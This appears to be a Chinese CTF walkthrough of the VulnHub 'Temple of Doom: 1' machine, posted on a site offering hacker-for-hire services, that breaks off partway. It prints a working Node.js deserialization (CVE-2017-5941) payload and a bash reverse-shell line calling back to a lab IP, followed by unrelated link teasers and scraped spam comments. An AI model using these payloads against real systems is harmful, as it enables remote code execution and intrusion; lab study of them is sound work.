当前位置:首页 > 黑客业务 > 正文内容

VulnHub-Temple of Doom: 1-靶机渗透学习

访客4年前 (2021-04-15)黑客业务1062

靶机地址:https://www.vulnhub.com/entry/temple-of-doom-1,243/

靶机难度:中级(CTF)

靶机发布日期:2018年6月8日

靶机描述:

由https://twitter.com/0katz创建的CTF

]难度:简单/中级

在VirtualBox中测试

注意:2种扎根方法

目标:得到root权限&找到flag.txt

作者:DXR嗯嗯呐

信息收集

nmap扫描IP

nmap端口扫描

22 ssh

666 Express 是一个保持最小规模的灵活的 Node.js Web 应用程序开发框架,为 Web 和移动应用程序提供一组强大的功能。

访问80端口

没有获得有用的信息,使用dirb,nikto扫描,结果也没发现什么

Node.js远程命令执行漏洞

不知道怎么办了,使用burpsuite抓一下包看看吧

看到了cookie的值可能是一个base64编码

界面获得一个json字符串感觉格式不完整,修改一下

解码后

{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMTIn0%3D

修改后

重新编码提交,获得一个界面

加上cookie使用dirb扫描依然失败,看了看老人们的,发现这里是考Node.js反序列化远程代码执行(CVE-2017-5941)这个漏洞

大佬写的很具体

{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('whoami',(error,stdout,stderr)=>{console.log(stdout)}); }()"}

  • child_process是node.js中的一个模块,它以类似于popen(3)的方式生成子进程。
  • child_process.exec 使用子进程exec执行命令,缓存子进程的输出,并将子进程的输出以回调函数参数的形式返回。

编译后

eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpe3JldHVybiByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ3dob2FtaScsKGUsb3V0LGVycik9Pntjb25zb2xlLmxvZyhvdXQpO30pOyB9KCkifQo=

获得用户名 nodeadmin

直接使用bash获得反弹shell

{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('bash -i >& /dev/tcp/192.168.56.3/5555 0>&1',(error,stdout,stderr)=>{console.log(stdout)}); }()"}

阅读剩余的19%

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/106174.html

“VulnHub-Temple of Doom: 1-靶机渗透学习” 的相关文章

华流芒种是几月几号农历

芒种是二十四节气之一,大家对于二十四节气也已经非常熟悉了,但是芒种是哪一天还不是很清楚,今年的芒种是阳历6月5日,那么2020年芒种是农历几月几号呢?接下来我们就一起了解一下吧。     2020年芒种是农历几月几号...

猪肉怎么选?颜色有区别吗?今天做饭的时候发现上次买的猪肉颜色跟这

猪肉怎么选?颜色有区别吗?今天做饭的时候发现上次买的猪肉颜色跟这 买猪肉时,根据肉的颜色、外观、气味等可以判断出肉的质量是好还是坏。优质的猪肉,脂肪白而硬,且带有香味。肉的外面往往有一层稍带干燥的膜,肉质紧密,富有弹性,手指压后凹陷处立即复原。 次鲜肉肉色较鲜肉暗,缺乏光泽,脂肪呈灰白色;表面带...

福田轻卡 - 福田官网

市场保有量也是最多的一种品牌卡车.银河路东,山东福田,尤其是维修和保养方面,廊坊。 我是今年2月份买的福田奥铃4点2米货车,请问这种车要多少钱呀,跨所有制的国有控股上市公司。斗,103,经销商报价:7点98万元马力:116,最大功率为76KW.7-10万的都有. 长度:3点3米排量:2点2L货箱,有...

今天发生的重大新闻5条,国内新闻最新消息10条

近期发生的额十件大新闻,伊朗重申继续实施核计划。本·拉登被击毙,近期国内外新闻要近期。 被关闭·国家最高科学技术奖揭晓"青藏铁路工程"等获奖·广西陆川一在建楼面坍塌14名工人坠地受伤,文汇报,执政党民族解放党总统,到了主要内容介绍完。 这是初中作业吧!月1日—德国总理默克尔倡议成立联合国经济理事会。...

今天猪肉价格多少钱一斤 「未来10天毛猪价格」

但是价格便宜点。比昨天下降 0点8;鸡蛋8点,我今天出售5头价格14点00,价格稳定;江苏活猪价15元/公斤左右,规模场品种猪价格在6点50-6,猪价或将有所回暖,点70元/斤之间,年的低迷期。 去年9月份以来,89元/公斤,山东省普通猪价格大约在6,从春节时的最高15元/公斤左右价格,现在江苏生猪...

存储过程oracle(oracle财务系统)

推荐教程:甲骨文教程 本文主要介绍甲骨文中的数据转换。 1.日期转换成字符串(以2016年10月20日为例) 选择to_char(sysdate,& # 39;yyyy-mm-DD hh24:mi:ss & # 39;)strDateTime从dual-获取年-月-日:分:秒-...

评论列表

性许路岷
3年前 (2022-07-04)

靶机地址:https://www.vulnhub.com/entry/temple-of-doom-1,243/靶机难度:中级(CTF)靶机发布日期:2018年6月8日靶机描述:由https://twitte

余安夙世
3年前 (2022-07-04)

Pntjb25zb2xlLmxvZyhvdXQpO30pOyB9KCkifQo=获得用户名 nodeadmin直接使用bash获得反弹shell{"username":"_$$ND_FUNC$$_function(){retu

世味双笙
3年前 (2022-07-05)

具体{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('whoami',(error,stdout,stderr)=>{console.l

笙沉溇涏
3年前 (2022-07-05)

:"_$$ND_FUNC$$_function(){return require('child_process').execSync('bash -i >& /dev/tcp/192.168.56.3/55

世味旧竹
3年前 (2022-07-05)

nodeadmin直接使用bash获得反弹shell{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('bash -i >

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。